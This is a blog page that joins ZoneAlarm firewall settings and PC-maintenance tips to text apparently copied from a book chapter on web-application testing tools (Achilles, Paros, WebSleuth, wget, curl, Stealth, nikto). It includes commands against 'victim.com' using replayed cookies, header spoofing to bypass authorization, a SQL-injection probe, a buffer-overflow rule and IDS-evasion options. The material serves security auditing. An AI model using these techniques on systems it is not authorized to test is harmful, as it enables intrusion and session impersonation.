ep6network | Network security

Network security, Security softwares,wifi security, wireless security

Welcome

At first welcome to my Network Security forum. Here you can find all the security features of a network and Operating system also. In this blog you will find the best notes. I tried to simplify and descriptive those notes. You can find here different types of Adware and Spyware threats and their prevention, definition of Different types virus and procedure their cure, Antivirus and some link of free antivirus, spy cure, adware cure etc. we can also learn here How to secure telephone network, Large area network (LAN), Wide area network. Here I have provided the trick of Firewall, The architecture of a network, Cryptography, Internet Key exchange, IP security, Crypto History, Cryptography Blocks and many more which will help you to further study. And this is not the end Keep visited this blog and I will provide you more a more security tricks. And don’t forget to comments on that if it is bad or good. Please do comment on my thesis. Your comments will help me to upgrade my thesis. And if you want some exact notes on some security tricks. Please do inform me. My email id is ep6secuirity@gmail.com I will try to do my best, if I will not be able to fulfill your requirements, I will make you inform.

Thanks and Regards

Utsav Basu

For – ep6network.

Sponcers

Your Ad Here


Configuring ZoneAlarm Security Settings


If you're running ZoneAlarm Pro you will probably have considered that most of the "advanced" settings might as well be in Chinese for all the use they are. User friendly they are not!

If you are not on a LAN (connected to another computer in a network) you can use this guide to give your firewall some real muscle and a new lease of life:

Launch ZoneAlarm Pro and click to highlight the "Firewall" tab on the left hand side . In the pane that appears on the right hand side in the section "Internet Zone Security" set the slider control to "High" Then click the "Custom" button in the same section.

The next settings page is divided into two sections with tabs Internet Zone and Trusted Zone at the top of the page. Under the Internet Zone tab there is a list of settings that can be accessed by scrolling. At the top is the high security settings and the only thing that should check from there is "allow broadcast/multicast". The rest should be unchecked.

Scroll down until you get to the medium security settings area. Check all the boxes in this section until you get to "Block Incomming UDP Ports". When you check that you will be asked to supply a list of ports, and in the field at the bottom of the page enter 1-65535

Then go back to the list and check the box alongside "Block Outgoing UDP Ports" and at the bottom of the page enter 1-19, 22-79, 82-7999, 8082-65535

Repeat this proceedure for the following settings
"Block Incomming TCP Ports": 1-65535
"Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
Then click "Apply", "Ok" at the bottom of the page.

Back in the right hand "Firewall" pane go next to the yellow "Trusted Zone Security" section and set it to "high" with the slider. Click "Custom" and repeat the above proceedure this time choosing the Trusted Zone tab at the top of the settings page.

These settings will stop all incoming packets @ports 1-65535 and also block all pings, trojans etc... this will also stop all spyware or applications from phoning home from your drive without your knowledge!



You may not realize it, but your computer and your car have something in common: they both need regular maintenance. No, you don't need to change your computer's oil. But you should be updating your software, keeping your antivirus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer's security.




Here are some basics maintenance tasks you can do today to start improving your computer's security. Be sure you make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft VV!|VD0VV$® or Macintosh), your antivirus program, and your firewall.
* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.
* Install software updates immediately.
When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)
An ounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software
* Step 2: Backup your files
* Step 3: Use antivirus software and keep it updated
* Step 4: Change your passwords


Developing ongoing maintenance practices

Now that you've done some ground work, it's time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. We recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost. (Accidents can happen.) To learn more read our tips for backing up information.


* Scan your files with up to date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program's user manual to see if you can schedule an automatic scan of your computer. To learn more, read our tips for reducing your virus risk
.
* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly (we recommend monthly) to reduce your risk. Also, choose your passwords carefully. To learn more, read our tips for creating stronger passwords
.

Making a schedule

One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, we suggest making a regular "appointment" with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information.

Application Inspection

So far we have looked at tools that examine the web server. In doing so, we miss vulnerabilities that may be present in the web application. This class of vulnerabilities arises from insecure programming and misconfiguration of the interaction between web servers and databases. We can’t explain the nature of web application insecurity and the methodology and techniques for finding those vulnerabilities within a single chapter. What we will show are the tools necessary for you to peek into a web application. Although a few of these programs have grown from the security community, they deserve a place in a web application programmer’s debugging tool kit as well.

Additional stunnel.conf Directives

Directive

Description

foreground

Values: yes or no
Available only for Unix-based stunnel execution. It will print activity to stderr, which is an excellent way to troubleshoot connectivity problems.

TIMEOUTbusy

Value: time in seconds
Time to wait for data. Available only as part of a specific service definition.

TIMEOUTclose

Value: time in seconds
Time to wait for close_notify socket messages. The stunnel developers recommend a value of zero when using the Internet Explorer browser. Available only as part of a specific service definition.

TIMEOUTidle

Value: time in seconds
Time to keep an idle connection before closing it. Available only as part of a specific service definition.

Achilles

Aptly named, Achilles helps pick apart web applications by acting as a proxy with a pause button. A normal proxy sits between a web browser and a web server, transparently forwarding requests and responses between the two. Achilles works similarly, but it adds functionality that lets you modify contents on the fly. For example, Achilles lets you manipulate cookie values, POST requests, hidden Form fields, and every other aspect of an HTTP transaction—even over SSL!

Implementation

Because it’s a proxy, Achilles must first be set up to listen on a port and placed into “intercept” mode. Clicking the play button (the triangle) starts the proxy, and clicking the stop (square) button stops it—think of a tape recorder’s controls.

It’s a good idea to leave the Ignore .jpg/.gif option enabled. Modifying image files rarely bypasses a web application’s security stance, and the number of requests it generates from a single web page quickly becomes annoying.

Next, set your web browser’s proxy to the IP address (127.0.0.1 if it’s the same computer) and port (5000, by default) on which Achilles listens. Normally, it’s easiest to run Achilles on your localhost. Any web browser that supports an HTTP proxy, from Lynx to Galeon, can use Achilles. The restriction to the Windows platform is that Achilles is a Win32 binary.

In basic intercept mode, you can browse a web site or multiple web sites transparently. The Log To File option will save the session to a file. This is useful for surveying a web application. The logfile holds every link that was visited, including helper files such as JavaScript (*.js) and other include (*.inc) files that are not normally seen in the URL. The other advantage is that you now have a copy of the HTML source of the target web site. This source might reveal hidden Form fields, cookie values, session-management variables, and other information about the application. The techniques for picking apart a web application are well beyond the scope of this chapter, but having a tool like Achilles is an absolute requirement for performing such tests.

In active intercept mode, you can view the requests made by the browser (Intercept Client Data) or responses sent by the server (Intercept Server Data (text)). Intercepting client data enables you to manipulate GET and POST requests as well as cookie values. This capability is used to bypass authentication and authorization schemes and to impersonate other users. Achilles' text box basically functions as a text editor.

Using Achilles probably sounds abstract by now. This is definitely a tool in the “pictures are worth a thousand words” category. Launch Achilles, change your web browser’s proxy setting, make sure to choose Intercept Client Data, and browse your favorite web site. You’ll be surprised to see what goes on behind the scenes of ordering a book or checking your bank balance!

Interception Problems Achilles intercepts only text data. A site that uses ActiveX components, also known as COM (Component Object Model) objects or CAB (cabinet) files, is more resilient to interception because such files appear as binary data that Achilles always ignores. Achilles still correctly proxies the HTTP connection, but you will not be able to manipulate the data. Other binary objects, such as downloading a ZIP or PDF file, are also proxied but are not shown in the text window.

Web sites that use SSL often generate errors in Achilles. A problematic site with 20 objects on its home page (such as pictures, style sheets, JavaScript files, and HTML) might generate 20 “Client failed SSL connection” errors. This is not really a big deal, but it does mean that you have to click 20 different OK buttons to close each error indication.

Some sites tend to cause Achilles to crash unexpectedly. There does not seem to be any good rule of thumb that determines which sites cause crashes and which do not. One workaround is to log onto the site with the proxy, and then start the proxy and change your browser’s settings once you come to a particular part of the application you wish to inspect. Unfortunately, this technique fails against sites that use strong session management. Finally, Achilles handles HTTP Basic Authentication, but any web application that uses NTLM Authentication (supported by IIS) will not work through Achilles.

WebSleuth

WebSleuth puts proxy functionality right in the browser. It is a set of Visual Basic routines wrapped around Internet Explorer. Obviously, this ties you to the Win32 platform, but the tool proves useful enough to consider for web application testing. It allows you to step through a site while examining cookies and HTML source, taking notes along the way. It has also grown from an Internet Explorer shim to a full-featured application testing tool. The 1.36 version is free, but buggy. The 1.41 series fixed several bugs and adds new functionality, most noticeably a request interceptor.

Implementations

The green, red, and blue buttons located on the bottom right control site navigation: Go, Back, Stop, Forward, Reload. The Properties, Toolbox, Plugins, and Favorites menus are accessed by clicking the menu with either mouse button.

The Source tab, enables you not only to view the HTML source of a web page but also apply syntax highlighting (AutoColor option) and even reformat muddled HTML into a more human-readable version (Cleanup option). This is a boon to anyone who has ever tried to slog through web applications whose HTML is littered with punctuation characters, tags, and too few spaces to separate it all.

The best addition to WebSleuth is the inclusion of the Intercept tab, configuration options cover almost any scenario one could wish to cover. The options enable you only to trigger the intercept engine for URLs with a particular file extension or if the URL contains a query string, which is one of the most common reasons for intercepting a request. It also triggers on POST requests or if the URL contains a particular string. Another setting allows for a Gateway Proxy, which enables you to chain WebSleuth with another proxy—something that Achilles sorely lacks.

Another addition to the control tab selections is the Spider tab, Just as you would expect, this tab sets the options for WebSleuth’s internal site crawling engine. The crawler has difficulty with authentication-based applications but nevertheless performs fairly well. A nice feature, which isn’t present on other local proxies, is the ability to add notes for each page. Highlight any of the pages in the left-hand pane of the Window and the right-hand pane displays and Add/Edit Notes button. You can take notes if the page has been tested, if any vulnerabilities were discovered, or if the HTML contained sensitive information.


The Properties menu button displays information about the current page. It does not affect “properties” of the application, nor can it change properties of the current page. It merely reports information. It is useful for extracting focused types of information about the current page: Links, Forms, Cookies, Frames, Query Strings, Images, Scripts, Comments, and Meta Tags.

The Toolbox menu button has some of the best functions. The HTML Transformations function is especially cool. It removes scripts that disable many types of input validation routines. It shows hidden fields, which reveal session, server, and client variables. Also, the Generate Report function creates an excellent list of the current page’s cookies, links, query strings, Form information, script references, comments, and META tags.

The Plugins menu serves as WebSleuth’s method of extending its core capabilities. It enables such activities as request editing (now over SSL as well), testing HTTP PUT and DELETE verbs, and cookie attribute manipulation.

Paros Proxy

Now that Achilles and WebSleuth have been mentioned, it is time to introduce the new heavyweight in the local proxy arena: Paros. While Achilles introduced the utility of local proxies, its development stalled prematurely and WebSleuth is intractably tied to Internet Explorer. Paros is a Java-based proxy that not only imitated the concept of a local proxy, but added significant enhancements to usability, testing techniques, and data presentation. In other words, you should download, install, and try Paros, because it’s an excellent tool!

Implementation

Paros is pure Java. Hence, you can download and compile the source yourself or simply obtain the binary and begin testing. You will need to use the Java 1.4 environment, so be sure to update your system’s Java installation if it does not meet this requirement. Once installed, launch Paros and set your browser’s HTTP proxy setting for port 8080 and HTTPS proxy for port 8443. Now, you are ready to begin examining a web application: navigate through the application as you normally would via the web browser. Paros silently records the directory and file structure of every request. The directory structure of an osCommerce application in the Web Site Hierarchy window in the upper-left corner of the interface.

Although Paros observes every aspect of the request, whether the request uses HTTP or HTTPS, it will log only cookies and the site hierarchy by default. If you wish to record other aspects of the application, navigate to the Filters tab on the interface and set your desired options, Even though the GET and POST files have an .xls extension, they are tab-delimited plain-text files that you can view with a text editor or import into a spreadsheet application. The files are written to the directory from which Paros is executed.

Your next option is to instruct Paros to scan the items in the site hierarchy for common vulnerabilities. Navigate to the Scan tab and check the types of scans you wish to perform, scans are not performed automatically. You must right-click an entry in the Web Site Hierarchy window. This opens a pop-up menu that enables you to select Scan Selected Node, Delete Selected Node, or Clear All. If you select Scan Selected Node, Paros begins its predefined tests.

The filters and scan options represent techniques not available in Achilles and only approximated in WebSleuth. Of course, the greatest benefit of a local proxy is the ability to intercept and rewrite web requests. Paros provides this capability in the Trap tab, which is split into two sections. The Header section shows the intercepted request when Trap Request is checked. This allows you to view and edit the entire URL and Headers that will be sent to the server. Once you click Continue, the Header and Body sections are populated with, appropriately enough, the HTTP Header and Body data returned by the server. This process is shown in the next two figures. You should notice that a single quote has been inserted into the forum='all URL parameter. Header, which used to contain the modified request, not contains the Date, Server, and other fields. More interesting is the Body section, which displays the error produced in the back-end MySQL database due to the extraneous single quote inserted into the forum parameter.

The ability to rewrite and insert arbitrary characters into HTTP GET and POST requests makes a tool like Paros indispensable for auditing the security of a web application. Paros is just a tool; the techniques and tricks of testing web application security are far too broad to cover in this chapter.

Finally, Paros has an additional function hidden under the Tools menu. You can have Paros spider any HTTP or HTTPS application and populate the site hierarchy window automatically. The spider function works with varying success that depends on what the application requires with regard to cookies, headers, and authentication. Nevertheless, it serves as a nice utility that will improve over time.

Wget

The final tool we present probably seems out of place compared to the previous tools. Wget is a command-line tool that basically copies a web site’s contents. It starts at the home page and follows every link until it has discovered every page of the web site. When someone performs a security audit of a web application, one of the first steps is to sift through every page of the application. For spammers, the goal would be to find e-mail addresses. For others, the goal would be to look for programmers’ notes that perhaps contain passwords, SQL statements, or other juicy tidbits. In the end, a local copy of the web application’s content enables the person to search large sites quickly for these types of information.

Wget has other uses from an administrator’s point of view, such as creating mirrors for highly trafficked web sites. The administrators for the mirrors of many web sites (such as http://www.samba.org and http://www.kernel.org) use wget or similar tools to reproduce the master server on alternative servers. They do this to reduce load and to spread web sites geographically.

Implementation

As wget’s main purpose is to download the contents of a web site, its usage is simple. To spider a web site recursively, use the –r option:

$ wget -r www.victim.com
...(continues for entire site)...

The -r or --recursive option instructs wget to follow every link on the home page. This will create a www.victim.com directory and populate that directory with every HTML file and directory wget finds for the site. A major advantage of wget is that it follows every link possible. Thus, it will download the output for every argument that the application passes to a page. For example, the viewer.asp file for a site might be downloaded four times:

  • viewer.asp@ID=555

  • viewer.asp@ID=7

  • viewer.asp@ID=42

  • viewer.asp@ID=23

The @ symbol represents the ? delimiter in the original URL. The ID is the first argument (parameter) passed to the viewer.asp file. Some sites may require more advanced options such as support for proxies and HTTP Basic Authentication. Sites protected by Basic Authentication can be spidered in this way:

[root@meddle]# wget –r --http-user:dwayne --http-pass:woodelf \
> https://www.victim.com/secure/
...continues for entire site...

Sites that rely on cookies for session state or authentication can also be spidered by wget. Create a cookie file that contains a set of valid cookies from a user’s session. The prerequisite, of course, is that you must be able to log in to the site to collect the cookie values. Then, use the --load-cookies option to instruct wget to impersonate that user based on the cookies:

$ wget --load-cookies=cookies.txt \
> –r https://www.victim.com/secure/menu.asp

Still other sites purposefully set cookies to defeat most spidering tools. Wget can handle session and saved cookies with the appropriately named –cookies option. It is a Boolean value, so you can either turn it off (the default) or on:

$ wget --load-cookies=cookies.txt –cookies=on \
> –r https://www.victim.com/secure/menu.asp

The --http-user and --http-passwd options enable wget to access web applications that employ HTTP Basic Authentication. Set the values on the command line and watch wget fly:

$ wget --http-user=guest –http-passwd=no1knows \
> –r https://www.victim.com/maillist/index.html

In the end, wget provides a quick method for downloading the HTML contents of a web application for off-line analysis. If you are frustrated by the spidering capabilities of Paros, then use wget to perform these tasks


All-Purpose Tools

The following tools serve as workhorses for making connections over HTTP or HTTPS. Alone, they do not find vulnerabilities or secure a system, but their functionality can be put to use to extend the abilities of a web vulnerability scanner, peek into SSL traffic, or encrypt client/server communication to protect it from network sniffers.

Curl

Where Netcat deserves the bragging rights of super network tool, curl deserves considerable respect as super protocol tool. Curl is a command-line tool that can handle DICT, File, FTP, Gopher, HTTP, HTTPS, LDAP, and Telnet requests. It also supports HTTP proxies. As this chapter focuses on web auditing tools, we’ll stick to the HTTP and HTTPS protocols. By now, it has become a de facto tool on most Linux and BSD distributions, plus Mac OSX and Cygwin.

Implementation

To connect to a web site, specify the URL on the command line, like so:

$ curl https://www.victim.com

Automated scripts that spider a web site or brute-force passwords really demonstrate the power of curl. some of the most useful of curl’s options.

Useful Web-Oriented Curl Options

Option

Description

-H/--header

Set a client-side header. Use an HTTP header to imitate several types of connections.
User-Agent: Mozilla/4.0

Spoof a particular browser
Referer: http://localhost/admin

Bypass poor authorization that checks the Referer page
Basic Auth: xxxxx Set a username and password
Host: localhost Specify virtual hosts

-b/--cookie

-c/--cookie-jar

-b uses a file that contains cookies to send to the server. For example,
-b cookie.txt includes the contents of cookie.txt with all HTTP requests. Cookies can also be specified on the command line in the form of -b ASPSESSIONID=INEIGNJCNDEECMNPCPOEEMNC; -c uses a file that stores cookies as they are set by the server. For example, -c cookies.txt holds every cookie from the server. Cookies are important for bypassing Form-based authentication and spoofing sessions.

-d/--data

Submit data with a POST request. This includes Form data or any other data generated by the web application. For example, to set the Form field for a login page, use -d login=arbogoth&passwd=p4ssw0rd. This option is useful for writing custom brute-force password guessing scripts. The real advantage is that the requests are made with POST requests, which are much harder to craft with a tool such as Netcat.

-G/--get

Change a POST method so that it uses GET. This applies only when you specify the –d option.

-u/--user

-U/--proxy-user

Set the username and password used for basic authentication or a proxy. To access a site with Basic Authentication, use -u user:password. To access a password-protected proxy, use -U user:password. This is meaningless if the –X option is not set.

--url

Set the URL to fetch. This does not have to be specified but helps for clarity when many command-line options are used. For example, —url https://www.victim.com/admin/menu.php?menu=adduser Curl gains speed optimizations when multiple URLs are specified on the command line because it tries to makes persistent connections. This means that all requests will be made over the original connection instead of establishing a new connection for each request.

-x/--proxy

Set an HTTP proxy. For example, -x http://intraweb:80/.

-K/--config

Set a configuration file that includes subsequent command-line options. For example, -K www.victim.com.curl. This is useful when it becomes necessary to specify multiple command-line options.

Catching Scan Signatures

As an administrator, you should be running vulnerability scanners against your web servers as part of routine maintenance. After all, it would be best to find your own vulnerabilities before someone else does. On the other hand, how can you tell if someone is running these tools against you? An intrusion detection system (IDS) can help, but an IDS has several drawbacks: it typically cannot handle high bandwidth, it relies on pattern-matching intelligence, it cannot (for the most part) watch encrypted SSL streams, and it is expensive (even the open-source snort requires a team to maintain and monitor events). The answer, in this case, is to turn to your logfiles. You enabled robust logging for your web server, right?

Common Signatures Logfiles are a security device. They are reactionary, meaning that if you see an attack signature in your file, you know you've already been attacked. If the attack compromised the server, web logs will be the first place to go for re-creating the event. Logs also help administrators and programmers track down bugs or bad pages on a web site—necessary to maintain a stable web server. With this in mind, you should have a policy for turning on the web server's logging, collecting the logfiles, reviewing the logfiles, and archiving the logfiles.

The following table lists several items to look for when performing a log review. Many of these checks can be automated with simple tools such as grep.


Stealth

Stealth is a vulnerability scanning tool created by Felipe Moniz. It uses the Windows GUI and therefore doesn’t have the cross-platform capability of nikto. Stealth’s strength lies in its number of checks and, like nikto, ease of updating its database. More than 13,000 checks currently populate the Stealth database, although only about 5000 of them are unique. These checks range from URLs that break obscure devices with embedded web servers to the most current IIS vulnerabilities.

Implementation

By Default, Stealth uses the “normal” Scan Rule, which contains roughly 6500 checks. This screen is accessed by clicking the Scanner button in the Stealth application window

Stealth can also scan a range of web servers. However, range must be a list of sequential IP addresses. It is not possible to load a custom list of target IP addresses. This slows down scans that target a network, because Stealth must first identify a web server before scanning it. When servers are distributed across networks, this is even slower.

One more note about scanning a range: Any time Stealth encounters an error, it pops up a message box that requires manual intervention to close. In short, Stealth is not the best tool for scanning multiple servers at once.

The IDS Test button works much like nikto’s IDS evasion techniques. Stealth offers 13 different evasion techniques. Select which techniques you want to use, and then choose CGI Setup | Use IDS Evasion.

When Stealth finishes a scan, it prompts the user to save the report. A Stealth report is an HTML file that lists any potential vulnerability it discovered. This is a quick, straightforward tool that assumes you want to run 6500 checks against a web server every time.

Creating New Rules

Rule construction for Stealth is simple. You specify the URL, the request method, and the expected HTTP return code. For example, to look for a backup index.html file, you would create a file with these contents:

#INF Backup index.html file
#GET /index.html.bak #200

The #GET method could also be #HEAD or #POST. The #200 return code can be any HTTP response. Stealth does not use custom arrays, so files within a set of directories must be listed individually. Both #GET and #200 are assumed by default and can be omitted. Thus, the basic URL checking of Stealth is not as robust as whisker. Stealth does try to simplify the vulnerability development process with its Stealth Exploit Development Tool.

The Exploit Development Tool is a GUI utility that prompts you for each of the possible fields that can be created for a vulnerability check.

The Options tab is where you specify a string that would indicate the check returned a false positive or specify a User-Agent. Some web applications rely on the User-Agent header for determining whether a browser can access the site. Some browsers do not support JavaScript, ActiveX, or Java that would cause the application to disallow access.

Another cool Stealth technique is the buffer overflow test. A buffer overflow attack can be crafted against any URL in a web application that has a parameter list. The Stealth rule for a buffer overflow has four components:

  • bofgen The URL, encased in double-quotation marks.

  • bofstr A placeholder for the buffer overflow string. The bofstr value is replaced by the actual attack.

  • bytes The number of times to repeat the buffer overflow character.

  • chars The buffer overflow character.

For example, here’s the rule to check for a buffer overflow condition in a web application’s login page:

#INF Login.asp buffer overflow check.

Pitfalls to Avoid

As mentioned, Stealth’s ability to scan a range of web servers automatically is severely limited. Stealth occasionally generates DNS errors, which usually happens when scanning a server with virtual hosts or when it scans a server with multiple IP addresses (as is the case for many large, load-balanced sites). A DNS error is innocuous, but it requires that you close the pop-up message box Stealth generates.

The majority of Stealth’s checks rely on the HTTP return code from the server. This is useful when you’re checking for the existence of a vulnerable script, but it does not necessarily indicate that a script is vulnerable. For example, many of the viewcode.asp vulnerabilities in IIS sample files have been fixed in recent updates, but Stealth merely checks for their presence and often produces false positives. Even though Stealth can parse the output of a check for a specific string, few of the checks seem to do so. Relying on the HTTP return code doesn’t mean that Stealth will miss vulnerabilities, but it does mean that it will produce a large number of false positives.

A GUI-based tool does not play well with others. It is difficult to create a script that generates a list of web servers or systems with port 80 open, input that list to Stealth, and then perform some file parsing on Stealth’s output. A command-line tool, on the other hand, doesn’t mind being wrapped in FOR loops and having data piped into it from other programs or sending its output to your favorite parsing tool. Remember the ease with which we manipulated the output from whisker with the tee and grep commands?

Finally, Stealth cannot handle SSL connections. This is a simple drawback to overcome.


bofgen=/login.asp?user=%bofstr&passwd=none","bytes=999","chars=A"

In the HTTP request that Stealth sends, the %bofstr string is replaced by 999 As.

Once any exploit is created, you must still instruct Stealth to use it. If you place the file in the Db subdirectory of the Stealth installation directory, Stealth will find the exploit and load it. To check this manually, or to create a new exploit, click the Database button in the Stealth application window and select the Stealth User’s Exploits tab.

Web Hacking Tools

Overview

Web server security can be divided into two broad categories: testing the server for common vulnerabilities and testing the web application. A web server should be configured according to this checklist before it is deployed on the Internet:

  • Secure network configuration A firewall or other device limits incoming traffic to necessary ports (probably just 80 and 443).

  • Secure host configuration The operating system has up-to-date security patches, auditing has been enabled, and only administrators may access the system.

  • Secure web server configuration The web server’s default settings have been reviewed, sample files have been removed, and the server runs in a restricted user account.

Of course, such a short list doesn’t cover the specifics of an Apache/PHP combination or the details of every recommended Internet Information Server (IIS) installation setting, but it should serve as the basis for a strong web server build policy. A vulnerability scanner should also be used to verify the build policy.

The security of the web application should be of concern as well. This chapter focuses on tools used to check a web server for common vulnerabilities, but the handful of tools mentioned here address the concept of testing the actual web application for security problems rather than just the server upon which the application is installed.

Vulnerability Scanners

Web servers such as Apache, iPlanet, and IIS have gone through many revisions and security updates. A web vulnerability scanner basically consists of a scanning engine and a catalog. The catalog contains a list of common files, files with known vulnerabilities, and common exploits for a range of servers. For example, a vulnerability scanner looks for backup files (such as renaming default.asp to default.asp.bak) or tries directory traversal exploits (such as checking for ..%255c..%255c). The scanning engine handles the logic for reading the catalog of exploits, sending the requests to the web server, and interpreting the requests to determine whether the server is vulnerable. These tools target vulnerabilities that are easily fixed by secure host configurations, updated security patches, and a clean web document root.

Nikto

Whisker, created by RFP, was created to add to a Perl-based scanning library rather than as a solo tool that would be further developed. Nikto, by Sullo, is based on the next generation LibWhisker library. From the start, it offers support for the Secure Sockets Layer (SSL), proxies, and port scanning.

Implementation

As a Perl-based scanner, nikto runs on Unix, Windows, and Mac OS X. It uses standard Perl libraries that accompany default Perl installations. You can download nikto from http://www.cirt.net. Nikto also requires LibWhisker (LW.pm), which is simple to install.

LibWhisker A fully functional copy of LibWhisker comes with the nikto tar file. Otherwise, you can always download the latest version from http://www.wiretrip.net/rfp/2/index.asp. Installation is simple, but it does vary ever so slightly from most CPAN modules. After untarring the download, enter the directory and make the library. Once that is done, install LW.pm into your Perl directory. You can do this in three commands:

$ cd libwhisker-current
$ perl Makefile.pl lib
$ perl Makefile.pl install

LibWhisker might seem redundant because it apes the functionality of several Perl modules that already exist, such as LWP, Base64, and HTML::Parser. The advantage of LibWhisker is that it is lean (a smaller file size than all the other modules it replaces), simple (a single module), focused (handles only HTTP and HTTPS requests), and robust (provides a single interface for handling request and response objects). It is also more legible than the original whisker! LibWhisker has also joined the legions of open source code on the sourceforge.net servers, so it shouldn’t be too hard to find.

Scanning To get started with nikto you need only to specify a target host with the -h option. As the engine discovers potential vulnerabilities, notes accompany the output to explain why a finding may be a security risk:

---------------------------------------------------------------------------
- Nikto 1.30/1.15 - www.cirt.net
+ Target IP: 10.0.1.14
+ Target Hostname:
+ Target Port: 80
+ Start Time: Thu Sep 25 17:07:36 2003
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use
-g to override + Server: Apache-AdvancedExtranetServer/2.0.44
(Mandrake Linux/11mdk)mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44
OpenSSL/0.9.7a PHP/4.3.1 + All CGI directories 'found' - assuming
invalid responses and using none (use -a to force check all possible
dirs)+ Allowed HTTP Methods: GET,HEAD,POST,OPTIONS,TRACE+ HTTP method
'TRACE' is typically only used for debugging. It should be disabled.
+ mod_ssl/2.0.44 appears to be outdated (current is at least mod_ssl/2.8.15)
(may depend on server version)
+ OpenSSL/0.9.7a appears to be outdated (current is at least 1.15)
+ PHP/4.3.1 appears to be outdated (current is at least PHP/4.3.3)
+ mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.1 - mod_ssl 2.8.7 and lower are
vulnerable to a remote buffer overflow which may allow a remote shell
(difficult to exploit). CAN-2002-0082.
+ PHP/4.3.1 - PHP below 4.3.3 may allow local attackers to safe mode and
gain access to unauthorized files. BID-8203.
+ /~root - Enumeration of users is possible by requesting ~username
(responds with Forbidden for real users, not found for non-existent users)
(GET).+ / - TRACE option appears to allow XSS or credential theft. See
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
(TRACE)
+ 1161 items checked - 2 items found on remote host
+ End Time: Thu Sep 25 17:10:03 2003 (147 seconds)
---------------------------------------------------------------------------


lists the basic options necessary to run nikto. The most important options are setting the target host, the target port, and the output file. Nikto accepts the first character of an option as a synonym. For example, you can specify –s or –ssl to use the HTTPS protocol, or you can specify –w or –web to format output in HTML.

Table 7-1: Basic Nikto Command-Line Options

Nikto Option

Description

-host

Specify a single host. Nikto does not accept files with hostnames, as in the –H option for whisker.

-port

Specify an arbitrary port. Take care; specifying port 443 does not imply HTTPS. You must remember to include –ssl.

-verbose

Provide verbose output. This cannot be abbreviated (-v is reserved for the virtual hosts option).

-ssl

Enable SSL support. Nikto does not assume HTTPS if you specify target port 443.

-generic

Instruct nikto to ignore the server's banner and run a scan using the entire database.

-Format

Format output in HTML, CSV, or text. Must be combined with
-output.
-F htm
-F csv
-F txt

-output

Log output to a file. For example,
-output nikto80_website.html –F htm

-id

Provide HTTP Basic Authentication credentials. For example,
-id username:password

-vhost

Use a virtual host for the target web server rather than the IP address. This affects the content of the HTTP Host: header. It is important to use this option in shared server environments.

-evasion

IDS evasion techniques. Nikto can use nine different techniques to format the URL request in an attempt to bypass unsophisticated string-matching intrusion detection systems

You should remember a few basics about running nikto: specify
the host (-h),port (-p), and SSL (-s), and write the output to
a file.


Additional Nikto Command-Line Options

Option

Description

-allcgi

Scan all possible CGI directories. This disregards 404 errors that nikto receives for the base directory. See the “Config.txt” section for instructions on how to configure which directories it will search.

-cookies

Print the cookies returned by the server. This either produces too much unnecessary information or very useful information depending on how the server treats unauthenticated users.

-mutate

Mutated checks are described in the “Config.txt” section.

-root

Prepend the directory supplied with –root to all requests. This helps when you wish to test sites with "off by one" directory structures. For example, many language localization techniques will prepend a two-character language identifier to the entire site.
/en/scripts/…
/en/scripts/include/…
/en/menu/foo/…
/de/scripts/…
When this is the case, nikto may incorrectly report that it could not find common scripts. Thus, use the –root option:
./nikto.pl –h website –p 80 –r /en

-findonly

Scan the target server. The scan can use nmap or internal Perl-based socket connections.

-nolookup

Do not resolve IP addresses to hostnames.

-timeout N

Stop scanning if no data is received after a period of N seconds. The default is 10.

-useproxy

Use the proxy defined in the config.txt file. Previous versions of nikto required you to turn this option on or off in the config.txt file. This is more convenient.

-debug

Enable verbose debug messages. This option cannot be abbreviated. It basically enumerates the LibWhisker request hash for each URL nikto retrieves. This information quickly becomes overwhelming; here's just a small portion of the information printed:
D: - Request Hash:
D: - Connection: Keep-Alive
D: - Content-Length: 0
D: - Host: 10.0.1.14
D: - User-Agent: Mozilla/4.75 (Nikto/1.30 )
D: - $whisker->INITIAL_MAGIC: 31337
D: - $whisker->anti_ids:
D: - $whisker->data:
D: - $whisker->force_bodysnatch: 0
D: - $whisker->force_close: 0
D: - $whisker->force_open: 0
D: - $whisker->host: 10.0.1.14
D: - $whisker->http_req_trailer:
D: - $whisker->http_ver: 1.1

-dbcheck

Perform a syntax check of the main scan_database.db and user_scan_database.db files. These files contain the specific tests that nikto performs against the server. You should need this only if you decide to customize one of these files (and if you do, consider dropping the nikto team an e-mail with your additions). This option cannot be abbreviated.

-update

Update nikto's plug-ins and find out whether a new version exists. This option cannot be abbreviated.

The –update option makes it easy to maintain nikto. It causes the program to connect to http://www.cirt.net and download the latest plug-ins to keep the scan list current:

$ ./nikto.pl –update
+ No updates required.
+ www.cirt.net message: Please report any bugs found in the 1.30 version

Config.txt Nikto uses the config.txt file to set certain options that are either used less often or are most likely to be used for every scan. This file includes a dozen settings. An option can be unset by commenting the line with a hash (#) symbol. Here are the default settings:

CGIDIRS=/bin/ /cgi/ /mpcgi/ /cgi-bin/ /cgi-sys/ /cgi-local/ /htbin/
/cgibin/ /cgis/ /scripts/ /cgi-win/ /fcgi-bin/
#CLIOPTS=-g –a
#NMAP=/usr/bin/nmap
KIPPORTS=21 111
#PROXYHOST=10.1.1.1
#PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword
DEFAULTHTTPVER=1.1
#PLUGINDIR=/usr/local/nikto/plugins
